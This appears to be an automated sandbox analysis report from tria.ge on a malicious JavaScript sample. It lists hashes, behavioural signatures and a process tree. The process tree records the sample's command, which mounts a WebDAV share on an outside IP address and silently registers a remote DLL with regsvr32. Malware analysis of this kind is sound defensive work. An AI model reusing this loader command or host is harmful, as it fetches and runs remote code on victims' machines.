Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 02:53
Static task
static1
Behavioral task
behavioral1
Sample
311366338260323153.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
311366338260323153.js
Resource
win10v2004-20240709-en
General
-
Target
311366338260323153.js
-
Size
4KB
-
MD5
dbbe419ed882ba70ef2d6084766b6194
-
SHA1
b784f452e4da8a37ed9de496803dba22b722b6be
-
SHA256
57e8bb00a304e7d1c7e856da0305980d0cf858255e9fbe8e173392eb0eb92bbd
-
SHA512
f5ce3c7e3dd7a15023954a221a04d12d4231caefd49d30eec91504d753c2e9e24e6a2f6aa8fcba2d03cedbbb88af15c4008e090cff80ca75591b192f0dc47109
-
SSDEEP
96:HRDb1e1y2mEKdSjKpHE11Q28tF5F5F5q5XpAkUtF5F5F5q5XpYb:HRf1R2gd8Kps8tHHHqxpAkUtHHHqxpYb
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2644 wrote to memory of 1624 2644 wscript.exe 84 PID 2644 wrote to memory of 1624 2644 wscript.exe 84 PID 1624 wrote to memory of 3016 1624 cmd.exe 86 PID 1624 wrote to memory of 3016 1624 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\311366338260323153.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\302023142719303.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3016
-
-